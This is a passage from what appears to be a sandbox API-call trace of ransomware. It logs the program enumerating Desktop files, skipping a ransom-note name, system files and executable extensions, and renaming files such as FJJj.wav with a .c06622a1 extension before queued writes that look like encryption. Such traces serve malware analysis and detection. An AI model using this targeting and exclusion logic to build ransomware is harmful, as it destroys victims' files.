(in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x23f67f9f [0155.941] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x7fa4f32b [0155.941] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x618a7f88 [0155.944] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x3900094, Length=0x80) returned 0xe83c97b3 [0155.944] RtlComputeCrc32 (PartialCrc=0x97b3, Buffer=0x3900094, Length=0x80) returned 0x79e5343a [0155.944] RtlComputeCrc32 (PartialCrc=0x343a, Buffer=0x3900094, Length=0x80) returned 0xa2fcce9b [0155.944] RtlComputeCrc32 (PartialCrc=0xce9b, Buffer=0x3900094, Length=0x80) returned 0x534647c4 [0155.944] RtlComputeCrc32 (PartialCrc=0x47c4, Buffer=0x3900094, Length=0x80) returned 0xa10e46b4 [0155.944] PostQueuedCompletionStatus (CompletionPort=0x130, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x3900020) returned 1 [0155.944] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x208e20) returned 1 [0155.944] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x218e28) returned 1 [0155.945] FindNextFileW (in: hFindFile=0x1327c8, lpFindFileData=0x32ed9c | out: lpFindFileData=0x32ed9c*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1bb180, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x11a, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0155.945] _wcsicmp (_Str1="desktop.ini", _Str2="README.c06622a1.TXT") returned -14 [0155.945] wcsstr (_Str="desktop.ini", _SubStr="README") returned 0x0 [0155.945] _wcsicmp (_Str1="autorun.inf", _Str2="desktop.ini") returned -3 [0155.945] wcslen (_String="autorun.inf") returned 0xb [0155.945] _wcsicmp (_Str1="boot.ini", _Str2="desktop.ini") returned -2 [0155.945] wcslen (_String="boot.ini") returned 0x8 [0155.945] _wcsicmp (_Str1="bootfont.bin", _Str2="desktop.ini") returned -2 [0155.945] wcslen (_String="bootfont.bin") returned 0xc [0155.945] _wcsicmp (_Str1="bootsect.bak", _Str2="desktop.ini") returned -2 [0155.945] wcslen (_String="bootsect.bak") returned 0xc [0155.945] _wcsicmp (_Str1="desktop.ini", _Str2="desktop.ini") returned 0 [0155.945] FindNextFileW (in: hFindFile=0x1327c8, lpFindFileData=0x32ed9c | out: lpFindFileData=0x32ed9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x31cfed50, ftCreationTime.dwHighDateTime=0x1d5d9a1, ftLastAccessTime.dwLowDateTime=0x45f0f100, ftLastAccessTime.dwHighDateTime=0x1d5e62e, ftLastWriteTime.dwLowDateTime=0x45f0f100, ftLastWriteTime.dwHighDateTime=0x1d5e62e, nFileSizeHigh=0x0, nFileSizeLow=0x75e, dwReserved0=0x0, dwReserved1=0x0, cFileName="FJJj.wav", cAlternateFileName="")) returned 1 [0155.945] _wcsicmp (_Str1="FJJj.wav", _Str2="README.c06622a1.TXT") returned -12 [0155.945] wcsstr (_Str="FJJj.wav", _SubStr="README") returned 0x0 [0155.945] _wcsicmp (_Str1="autorun.inf", _Str2="FJJj.wav") returned -5 [0155.945] wcslen (_String="autorun.inf") returned 0xb [0155.945] _wcsicmp (_Str1="boot.ini", _Str2="FJJj.wav") returned -4 [0155.945] wcslen (_String="boot.ini") returned 0x8 [0155.945] _wcsicmp (_Str1="bootfont.bin", _Str2="FJJj.wav") returned -4 [0155.945] wcslen (_String="bootfont.bin") returned 0xc [0155.945] _wcsicmp (_Str1="bootsect.bak", _Str2="FJJj.wav") returned -4 [0155.945] wcslen (_String="bootsect.bak") returned 0xc [0155.945] _wcsicmp (_Str1="desktop.ini", _Str2="FJJj.wav") returned -2 [0155.945] wcslen (_String="desktop.ini") returned 0xb [0155.945] _wcsicmp (_Str1="iconcache.db", _Str2="FJJj.wav") returned 3 [0155.945] wcslen (_String="iconcache.db") returned 0xc [0155.945] _wcsicmp (_Str1="ntldr", _Str2="FJJj.wav") returned 8 [0155.946] wcslen (_String="ntldr") returned 0x5 [0155.946] _wcsicmp (_Str1="ntuser.dat", _Str2="FJJj.wav") returned 8 [0155.946] wcslen (_String="ntuser.dat") returned 0xa [0155.946] _wcsicmp (_Str1="ntuser.dat.log", _Str2="FJJj.wav") returned 8 [0155.946] wcslen (_String="ntuser.dat.log") returned 0xe [0155.946] _wcsicmp (_Str1="ntuser.ini", _Str2="FJJj.wav") returned 8 [0155.946] wcslen (_String="ntuser.ini") returned 0xa [0155.946] _wcsicmp (_Str1="thumbs.db", _Str2="FJJj.wav") returned 14 [0155.946] wcslen (_String="thumbs.db") returned 0x9 [0155.946] _wcsicmp (_Str1="386", _Str2="wav") returned -68 [0155.946] wcslen (_String="386") returned 0x3 [0155.946] _wcsicmp (_Str1="adv", _Str2="wav") returned -22 [0155.946] wcslen (_String="adv") returned 0x3 [0155.946] _wcsicmp (_Str1="ani", _Str2="wav") returned -22 [0155.946] wcslen (_String="ani") returned 0x3 [0155.946] _wcsicmp (_Str1="bat", _Str2="wav") returned -21 [0155.946] wcslen (_String="bat") returned 0x3 [0155.946] _wcsicmp (_Str1="bin", _Str2="wav") returned -21 [0155.946] wcslen (_String="bin") returned 0x3 [0155.946] _wcsicmp (_Str1="cab", _Str2="wav") returned -20 [0155.946] wcslen (_String="cab") returned 0x3 [0155.946] _wcsicmp (_Str1="cmd", _Str2="wav") returned -20 [0155.946] wcslen (_String="cmd") returned 0x3 [0155.946] _wcsicmp (_Str1="com", _Str2="wav") returned -20 [0155.946] wcslen (_String="com") returned 0x3 [0155.946] _wcsicmp (_Str1="cpl", _Str2="wav") returned -20 [0155.947] wcslen (_String="cpl") returned 0x3 [0155.947] _wcsicmp (_Str1="cur", _Str2="wav") returned -20 [0155.947] wcslen (_String="cur") returned 0x3 [0155.947] _wcsicmp (_Str1="deskthemepack", _Str2="wav") returned -19 [0155.947] wcslen (_String="deskthemepack") returned 0xd [0155.947] _wcsicmp (_Str1="diagcab", _Str2="wav") returned -19 [0155.947] wcslen (_String="diagcab") returned 0x7 [0155.947] _wcsicmp (_Str1="diagcfg", _Str2="wav") returned -19 [0155.947] wcslen (_String="diagcfg") returned 0x7 [0155.947] _wcsicmp (_Str1="diagpkg", _Str2="wav") returned -19 [0155.947] wcslen (_String="diagpkg") returned 0x7 [0155.947] _wcsicmp (_Str1="dll", _Str2="wav") returned -19 [0155.947] wcslen (_String="dll") returned 0x3 [0155.947] _wcsicmp (_Str1="drv", _Str2="wav") returned -19 [0155.947] wcslen (_String="drv") returned 0x3 [0155.947] _wcsicmp (_Str1="exe", _Str2="wav") returned -18 [0155.947] wcslen (_String="exe") returned 0x3 [0155.947] _wcsicmp (_Str1="hlp", _Str2="wav") returned -15 [0155.947] wcslen (_String="hlp") returned 0x3 [0155.947] _wcsicmp (_Str1="icl", _Str2="wav") returned -14 [0155.947] wcslen (_String="icl") returned 0x3 [0155.947] _wcsicmp (_Str1="icns", _Str2="wav") returned -14 [0155.947] wcslen (_String="icns") returned 0x4 [0155.947] _wcsicmp (_Str1="ico", _Str2="wav") returned -14 [0155.947] wcslen (_String="ico") returned 0x3 [0155.947] _wcsicmp (_Str1="ics", _Str2="wav") returned -14 [0155.948] wcslen (_String="ics") returned 0x3 [0155.948] _wcsicmp (_Str1="idx", _Str2="wav") returned -14 [0155.948] wcslen (_String="idx") returned 0x3 [0155.948] _wcsicmp (_Str1="ldf", _Str2="wav") returned -11 [0155.948] wcslen (_String="ldf") returned 0x3 [0155.948] _wcsicmp (_Str1="lnk", _Str2="wav") returned -11 [0155.948] wcslen (_String="lnk") returned 0x3 [0155.948] _wcsicmp (_Str1="mod", _Str2="wav") returned -10 [0155.948] wcslen (_String="mod") returned 0x3 [0155.948] _wcsicmp (_Str1="mpa", _Str2="wav") returned -10 [0155.948] wcslen (_String="mpa") returned 0x3 [0155.948] _wcsicmp (_Str1="msc", _Str2="wav") returned -10 [0155.948] wcslen (_String="msc") returned 0x3 [0155.948] _wcsicmp (_Str1="msp", _Str2="wav") returned -10 [0155.948] wcslen (_String="msp") returned 0x3 [0155.948] _wcsicmp (_Str1="msstyles", _Str2="wav") returned -10 [0155.948] wcslen (_String="msstyles") returned 0x8 [0155.948] _wcsicmp (_Str1="msu", _Str2="wav") returned -10 [0155.948] wcslen (_String="msu") returned 0x3 [0155.948] _wcsicmp (_Str1="nls", _Str2="wav") returned -9 [0155.948] wcslen (_String="nls") returned 0x3 [0155.948] _wcsicmp (_Str1="nomedia", _Str2="wav") returned -9 [0155.948] wcslen (_String="nomedia") returned 0x7 [0155.949] _wcsicmp (_Str1="ocx", _Str2="wav") returned -8 [0155.949] wcslen (_String="ocx") returned 0x3 [0155.949] _wcsicmp (_Str1="prf", _Str2="wav") returned -7 [0155.949] wcslen (_String="prf") returned 0x3 [0155.949] _wcsicmp (_Str1="ps1", _Str2="wav") returned -7 [0155.949] wcslen (_String="ps1") returned 0x3 [0155.949] _wcsicmp (_Str1="rom", _Str2="wav") returned -5 [0155.949] wcslen (_String="rom") returned 0x3 [0155.949] _wcsicmp (_Str1="rtp", _Str2="wav") returned -5 [0155.949] wcslen (_String="rtp") returned 0x3 [0155.949] _wcsicmp (_Str1="scr", _Str2="wav") returned -4 [0155.949] wcslen (_String="scr") returned 0x3 [0155.949] _wcsicmp (_Str1="shs", _Str2="wav") returned -4 [0155.949] wcslen (_String="shs") returned 0x3 [0155.949] _wcsicmp (_Str1="spl", _Str2="wav") returned -4 [0155.949] wcslen (_String="spl") returned 0x3 [0155.949] _wcsicmp (_Str1="sys", _Str2="wav") returned -4 [0155.949] wcslen (_String="sys") returned 0x3 [0155.949] _wcsicmp (_Str1="theme", _Str2="wav") returned -3 [0155.949] wcslen (_String="theme") returned 0x5 [0155.949] _wcsicmp (_Str1="themepack", _Str2="wav") returned -3 [0155.949] wcslen (_String="themepack") returned 0x9 [0155.949] _wcsicmp (_Str1="wpx", _Str2="wav") returned 15 [0155.949] wcslen (_String="wpx") returned 0x3 [0155.950] _wcsicmp (_Str1="lock", _Str2="wav") returned -11 [0155.950] wcslen (_String="lock") returned 0x4 [0155.950] _wcsicmp (_Str1="key", _Str2="wav") returned -12 [0155.950] wcslen (_String="key") returned 0x3 [0155.950] _wcsicmp (_Str1="hta", _Str2="wav") returned -15 [0155.950] wcslen (_String="hta") returned 0x3 [0155.950] _wcsicmp (_Str1="msi", _Str2="wav") returned -10 [0155.950] wcslen (_String="msi") returned 0x3 [0155.950] _wcsicmp (_Str1="pdb", _Str2="wav") returned -7 [0155.950] wcslen (_String="pdb") returned 0x3 [0155.950] _wcsicmp (_Str1="sqlite", _Str2="wav") returned -4 [0155.950] wcslen (_String="sqlite") returned 0x6 [0155.950] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0155.950] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x208e20 [0155.950] wcscpy (in: _Dest=0x208e20, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" [0155.950] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x29 [0155.950] wcscpy (in: _Dest=0x208e74, _Source="FJJj.wav" | out: _Dest="FJJj.wav") returned="FJJj.wav" [0155.950] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\FJJj.wav", dwFileAttributes=0x80) returned 1 [0155.951] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\FJJj.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\fjjj.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x194 [0155.951] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0xffffff70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0155.951] ReadFile (in: hFile=0x194, lpBuffer=0x32ec24, nNumberOfBytesToRead=0x90, lpNumberOfBytesRead=0x32ecb4, lpOverlapped=0x0 | out: lpBuffer=0x32ec24*, lpNumberOfBytesRead=0x32ecb4*=0x90, lpOverlapped=0x0) returned 1 [0155.952] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x32ec24, Length=0x80) returned 0xfdc81ab0 [0155.952] RtlComputeCrc32 (PartialCrc=0x1ab0, Buffer=0x32ec24, Length=0x80) returned 0x147ab66d [0155.952] RtlComputeCrc32 (PartialCrc=0xb66d, Buffer=0x32ec24, Length=0x80) returned 0xbcd4370d [0155.952] RtlComputeCrc32 (PartialCrc=0x370d, Buffer=0x32ec24, Length=0x80) returned 0x8ccce7cb [0155.952] RtlComputeCrc32 (PartialCrc=0xe7cb, Buffer=0x32ec24, Length=0x80) returned 0x3c1e1e05 [0155.952] CloseHandle (hObject=0x194) returned 1 [0155.952] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x218e28 [0155.952] wcscpy (in: _Dest=0x218e28, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\FJJj.wav" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\FJJj.wav") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\FJJj.wav" [0155.952] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\FJJj.wav") returned 0x32 [0155.952] wcscpy (in: _Dest=0x218e8c, _Source=".c06622a1" | out: _Dest=".c06622a1") returned=".c06622a1" [0155.952] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\FJJj.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\fjjj.wav"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\FJJj.wav.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\fjjj.wav.c06622a1"), dwFlags=0x8) returned 1 [0156.030] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\FJJj.wav.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\fjjj.wav.c06622a1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x48000000, hTemplateFile=0x0) returned 0x194 [0156.031] CreateIoCompletionPort (FileHandle=0x194, ExistingCompletionPort=0xd8, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0xd8 [0156.031] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x80104) returned 0x710020 [0156.035] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x19269c98 [0156.035] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x561bc405 [0156.035] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x7d64cf8e [0156.035] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x4c30658d [0156.035] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x71bb2367 [0156.035] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x71666013 [0156.035] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x6cb6bbe8 [0156.035] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x7879ae40 [0156.038] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x710094, Length=0x80) returned 0xeb6de462 [0156.038] RtlComputeCrc32 (PartialCrc=0xe462, Buffer=0x710094, Length=0x80) returned 0x8b98116f [0156.038] RtlComputeCrc32 (PartialCrc=0x116f, Buffer=0x710094, Length=0x80) returned 0xf018d197 [0156.038] RtlComputeCrc32 (PartialCrc=0xd197, Buffer=0x710094, Length=0x80) returned 0x9631fed9 [0156.038] RtlComputeCrc32 (PartialCrc=0xfed9, Buffer=0x710094, Length=0x80) returned 0xfd146f7b [0156.038] PostQueuedCompletionStatus (CompletionPort=0xd8, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x710020) returned 1 [0156.038] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x208e20) returned 1 [0156.038] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x218e28) returned 1 [0156.038] FindNextFileW (in: hFindFile=0x1327c8, lpFindFileData=0x32ed9c | out: lpFindFileData=0x32ed9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x45223880, ftCreationTime.dwHighDateTime=0x1d6eb2b, ftLastAccessTime.dwLowDateTime=0x45bacf00, ftLastAccessTime.dwHighDateTime=0x1d6eb2b, ftLastWriteTime.dwLowDateTime=0xa3015100, ftLastWriteTime.dwHighDateTime=0x1d6eb28, nFileSizeHigh=0x0, nFileSizeLow=0xec00, dwReserved0=0x0, dwReserved1=0x0, cFileName="idfoodsf.exe", cAlternateFileName="")) returned 1 [0156.038] _wcsicmp (_Str1="idfoodsf.exe", _Str2="README.c06622a1.TXT") returned -9 [0156.038] wcsstr (_Str="idfoodsf.exe", _SubStr="README") returned 0x0 [0156.038] _wcsicmp (_Str1="autorun.inf", _Str2="idfoodsf.exe") returned -8 [0156.038] wcslen (_String="autorun.inf") returned 0xb [0156.038] _wcsicmp (_Str1="boot.ini", _Str2="idfoodsf.exe") returned -7 [0156.038] wcslen (_String="boot.ini") returned 0x8 [0156.038] _wcsicmp (_Str1="bootfont.bin", _Str2="idfoodsf.exe") returned -7 [0156.039] wcslen (_String="bootfont.bin") returned 0xc [0156.039] _wcsicmp (_Str1="bootsect.bak", _Str2="idfoodsf.exe") returned -7 [0156.039] wcslen (_String="bootsect.bak") returned 0xc [0156.039] _wcsicmp (_Str1="desktop.ini", _Str2="idfoodsf.exe") returned -5 [0156.039] wcslen (_String="desktop.ini") returned 0xb [0156.039] _wcsicmp (_Str1="iconcache.db", _Str2="idfoodsf.exe") returned -1 [0156.039] wcslen (_String="iconcache.db") returned 0xc [0156.039] _wcsicmp (_Str1="ntldr", _Str2="idfoodsf.exe") returned 5 [0156.039] wcslen (_String="ntldr") returned 0x5 [0156.039] _wcsicmp (_Str1="ntuser.dat", _Str2="idfoodsf.exe") returned 5 [0156.039] wcslen (_String="ntuser.dat") returned 0xa [0156.039] _wcsicmp (_Str1="ntuser.dat.log", _Str2="idfoodsf.exe") returned 5 [0156.039] wcslen (_String="ntuser.dat.log") returned 0xe [0156.039] _wcsicmp (_Str1="ntuser.ini", _Str2="idfoodsf.exe") returned 5 [0156.039] wcslen (_String="ntuser.ini") returned 0xa [0156.039] _wcsicmp (_Str1="thumbs.db", _Str2="idfoodsf.exe") returned 11 [0156.039] wcslen (_String="thumbs.db") returned 0x9 [0156.039] _wcsicmp (_Str1="386", _Str2="exe") returned -50 [0156.039] wcslen (_String="386") returned 0x3 [0156.039] _wcsicmp (_Str1="adv", _Str2="exe") returned -4 [0156.039] wcslen (_String="adv") returned 0x3 [0156.039] _wcsicmp (_Str1="ani", _Str2="exe") returned -4 [0156.039] wcslen (_String="ani") returned 0x3 [0156.039] _wcsicmp (_Str1="bat", _Str2="exe") returned -3 [0156.039] wcslen (_String="bat") returned 0x3 [0156.039] _wcsicmp (_Str1="bin", _Str2="exe") returned -3 [0156.039] wcslen (_String="bin") returned 0x3 [0156.039] _wcsicmp (_Str1="cab", _Str2="exe") returned -2 [0156.039] wcslen (_String="cab") returned 0x3 [0156.039] _wcsicmp (_Str1="cmd", _Str2="exe") returned -2 [0156.039] wcslen (_String="cmd") returned 0x3 [0156.039] _wcsicmp (_Str1="com", _Str2="exe") returned -2 [0156.040] wcslen (_String="com") returned 0x3 [0156.040] _wcsicmp (_Str1="cpl", _Str2="exe") returned -2 [0156.040] wcslen (_String="cpl") returned 0x3 [0156.040] _wcsicmp (_Str1="cur", _Str2="exe") returned -2 [0156.040] wcslen (_String="cur") returned 0x3 [0156.040] _wcsicmp (_Str1="deskthemepack", _Str2="exe") returned -1 [0156.040] wcslen (_String="deskthemepack") returned 0xd [0156.040] _wcsicmp (_Str1="diagcab", _Str2="exe") returned -1 [0156.040] wcslen (_String="diagcab") returned 0x7 [0156.040] _wcsicmp (_Str1="diagcfg", _Str2="exe") returned -1 [0156.040] wcslen (_String="diagcfg") returned 0x7 [0156.040] _wcsicmp (_Str1="diagpkg", _Str2="exe") returned -1 [0156.040] wcslen (_String="diagpkg") returned 0x7 [0156.040] _wcsicmp (_Str1="dll", _Str2="exe") returned -1 [0156.040] wcslen (_String="dll") returned 0x3 [0156.040] _wcsicmp (_Str1="drv", _Str2="exe") returned -1 [0156.040] wcslen (_String="drv") returned 0x3 [0156.040] _wcsicmp (_Str1="exe", _Str2="exe") returned 0 [0156.040] FindNextFileW (in: hFindFile=0x1327c8, lpFindFileData=0x32ed9c | out: lpFindFileData=0x32ed9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x938c4760, ftCreationTime.dwHighDateTime=0x1d5d99b, ftLastAccessTime.dwLowDateTime=0xef1a9480, ftLastAccessTime.dwHighDateTime=0x1d5e7ae, ftLastWriteTime.dwLowDateTime=0xef1a9480, ftLastWriteTime.dwHighDateTime=0x1d5e7ae, nFileSizeHigh=0x0, nFileSizeLow=0xfcc9, dwReserved0=0x0, dwReserved1=0x0, cFileName="iTQ-yXGXHtYUFbxa.png", cAlternateFileName="ITQ-YX~1.PNG")) returned 1 [0156.040] _wcsicmp (_Str1="iTQ-yXGXHtYUFbxa.png", _Str2="README.c06622a1.TXT") returned -9 [0156.040] wcsstr (_Str="iTQ-yXGXHtYUFbxa.png", _SubStr="README") returned 0x0 [0156.040] _wcsicmp (_Str1="autorun.inf", _Str2="iTQ-yXGXHtYUFbxa.png") returned -8 [0156.040] wcslen (_String="autorun.inf") returned 0xb [0156.040] _wcsicmp (_Str1="boot.ini", _Str2="iTQ-yXGXHtYUFbxa.png") returned -7 [0156.040] wcslen (_String="boot.ini") returned 0x8 [0156.040] _wcsicmp (_Str1="bootfont.bin", _Str2="iTQ-yXGXHtYUFbxa.png") returned -7 [0156.040] wcslen (_String="bootfont.bin") returned 0xc [0156.040] _wcsicmp (_Str1="bootsect.bak", _Str2="iTQ-yXGXHtYUFbxa.png") returned -7 [0156.040] wcslen (_String="bootsect.bak") returned 0xc [0156.040] _wcsicmp (_Str1="desktop.ini", _Str2="iTQ-yXGXHtYUFbxa.png") returned -5 [0156.040] wcslen (_String="desktop.ini") returned 0xb [0156.040] _wcsicmp (_Str1="iconcache.db", _Str2="iTQ-yXGXHtYUFbxa.png") returned -17 [0156.040] wcslen (_String="iconcache.db") returned 0xc [0156.040] _wcsicmp (_Str1="ntldr", _Str2="iTQ-yXGXHtYUFbxa.png") returned 5 [0156.040] wcslen (_String="ntldr") returned 0x5 [0156.041] _wcsicmp (_Str1="ntuser.dat", _Str2="iTQ-yXGXHtYUFbxa.png") returned 5 [0156.041] wcslen (_String="ntuser.dat") returned 0xa [0156.041] _wcsicmp (_Str1="ntuser.dat.log", _Str2="iTQ-yXGXHtYUFbxa.png") returned 5 [0156.041] wcslen (_String="ntuser.dat.log") returned 0xe [0156.041] _wcsicmp (_Str1="ntuser.ini", _Str2="iTQ-yXGXHtYUFbxa.png") returned 5 [0156.041] wcslen (_String="ntuser.ini") returned 0xa [0156.041] _wcsicmp (_Str1="thumbs.db", _Str2="iTQ-yXGXHtYUFbxa.png") returned 11 [0156.041] wcslen (_String="thumbs.db") returned 0x9 [0156.041] _wcsicmp (_Str1="386", _Str2="png") returned -61 [0156.041] wcslen (_String="386") returned 0x3 [0156.041] _wcsicmp (_Str1="adv", _Str2="png") returned -15 [0156.041] wcslen (_String="adv") returned 0x3 [0156.041] _wcsicmp (_Str1="ani", _Str2="png") returned -15 [0156.041] wcslen (_String="ani") returned 0x3 [0156.041] _wcsicmp (_Str1="bat", _Str2="png") returned -14 [0156.041] wcslen (_String="bat") returned 0x3 [0156.041] _wcsicmp (_Str1="bin", _Str2="png") returned -14 [0156.041] wcslen (_String="bin") returned 0x3 [0156.041] _wcsicmp (_Str1="cab", _Str2="png") returned -13 [0156.041] wcslen (_String="cab") returned 0x3 [0156.041] _wcsicmp (_Str1="cmd", _Str2="png") returned -13 [0156.041] wcslen (_String="cmd") returned 0x3 [0156.041] _wcsicmp (_Str1="com", _Str2="png") returned -13 [0156.041] wcslen (_String="com") returned 0x3 [0156.041] _wcsicmp (_Str1="cpl", _Str2="png") returned -13 [0156.041] wcslen (_String="cpl") returned 0x3 [0156.041] _wcsicmp (_Str1="cur", _Str2="png") returned -13 [0156.041] wcslen (_String="cur") returned 0x3 [0156.041] _wcsicmp (_Str1="deskthemepack", _Str2="png") returned -12 [0156.041] wcslen (_String="deskthemepack") returned 0xd [0156.041] _wcsicmp (_Str1="diagcab", _Str2="png") returned -12 [0156.041] wcslen (_String="diagcab") returned 0x7 [0156.041] _wcsicmp (_Str1="diagcfg", _Str2="png") returned -12 [0156.041] wcslen (_String="diagcfg") returned 0x7 [0156.041] _wcsicmp (_Str1="diagpkg", _Str2="png") returned -12 [0156.041] wcslen (_String="diagpkg") returned 0x7 [0156.042] _wcsicmp (_Str1="dll", _Str2="png") returned -12 [0156.042] wcslen (_String="dll") returned 0x3 [0156.042] _wcsicmp (_Str1="drv", _Str2="png") returned -12 [0156.042] wcslen (_String="drv") returned 0x3 [0156.042] _wcsicmp (_Str1="exe", _Str2="png") returned -11 [0156.042] wcslen (_String="exe") returned 0x3 [0156.042] _wcsicmp (_Str1="hlp", _Str2="png") returned -8 [0156.042] wcslen (_String="hlp") returned 0x3 [0156.042] _wcsicmp (_Str1="icl", _Str2="png") returned -7 [0156.042] wcslen (_String="icl") returned 0x3 [0156.042] _wcsicmp (_Str1="icns", _Str2="png") returned -7 [0156.042] wcslen (_String="icns") returned 0x4 [0156.042] _wcsicmp (_Str1="ico", _Str2="png") returned -7 [0156.042] wcslen (_String="ico") returned 0x3 [0156.042] _wcsicmp (_Str1="ics", _Str2="png") returned -7 [0156.042] wcslen (_String="ics") returned 0x3 [0156.042] _wcsicmp (_Str1="idx", _Str2="png") returned -7 [0156.042] wcslen (_String="idx") returned 0x3 [0156.042] _wcsicmp (_Str1="ldf", _Str2="png") returned -4 [0156.042] wcslen (_String="ldf") returned 0x3 [0156.042] _wcsicmp (_Str1="lnk", _Str2="png") returned -4 [0156.042] wcslen (_String="lnk") returned 0x3 [0156.042] _wcsicmp (_Str1="mod", _Str2="png") returned -3 [0156.042] wcslen (_String="mod") returned 0x3 [0156.042] _wcsicmp (_Str1="mpa", _Str2="png") returned -3 [0156.042] wcslen (_String="mpa") returned 0x3 [0156.042] _wcsicmp (_Str1="msc", _Str2="png") returned -3 [0156.042] wcslen (_String="msc") returned 0x3 [0156.042] _wcsicmp (_Str1="msp", _Str2="png") returned -3 [0156.042] wcslen (_String="msp") returned 0x3 [0156.042] _wcsicmp (_Str1="msstyles", _Str2="png") returned -3 [0156.042] wcslen (_String="msstyles") returned 0x8 [0156.042] _wcsicmp (_Str1="msu", _Str2="png") returned -3 [0156.042] wcslen (_String="msu") returned 0x3 [0156.042] _wcsicmp (_Str1="nls", _Str2="png") returned -2 [0156.042] wcslen (_String="nls") returned 0x3 [0156.043] _wcsicmp (_Str1="nomedia", _Str2="png") returned -2 [0156.043] wcslen (_String="nomedia") returned 0x7 [0156.043] _wcsicmp (_Str1="ocx", _Str2="png") returned -1 [0156.043] wcslen (_String="ocx") returned 0x3 [0156.043] _wcsicmp (_Str1="prf", _Str2="png") returned 4 [0156.043] wcslen (_String="prf") returned 0x3 [0156.043] _wcsicmp (_Str1="ps1", _Str2="png") returned 5 [0156.043] wcslen (_String="ps1") returned 0x3 [0156.043] _wcsicmp (_Str1="rom", _Str2="png") returned 2 [0156.043] wcslen (_String="rom") returned 0x3 [0156.043] _wcsicmp (_Str1="rtp", _Str2="png") returned 2 [0156.043] wcslen (_String="rtp") returned 0x3 [0156.043] _wcsicmp (_Str1="scr", _Str2="png") returned 3 [0156.043] wcslen (_String="scr") returned 0x3 [0156.043] _wcsicmp (_Str1="shs", _Str2="png") returned 3 [0156.043] wcslen (_String="shs") returned 0x3 [0156.043] _wcsicmp (_Str1="spl", _Str2="png") returned 3 [0156.043] wcslen (_String="spl") returned 0x3 [0156.043] _wcsicmp (_Str1="sys", _Str2="png") returned 3 [0156.043] wcslen (_String="sys") returned 0x3 [0156.043] _wcsicmp (_Str1="theme", _Str2="png") returned 4 [0156.043] wcslen (_String="theme") returned 0x5 [0156.043] _wcsicmp (_Str1="themepack", _Str2="png") 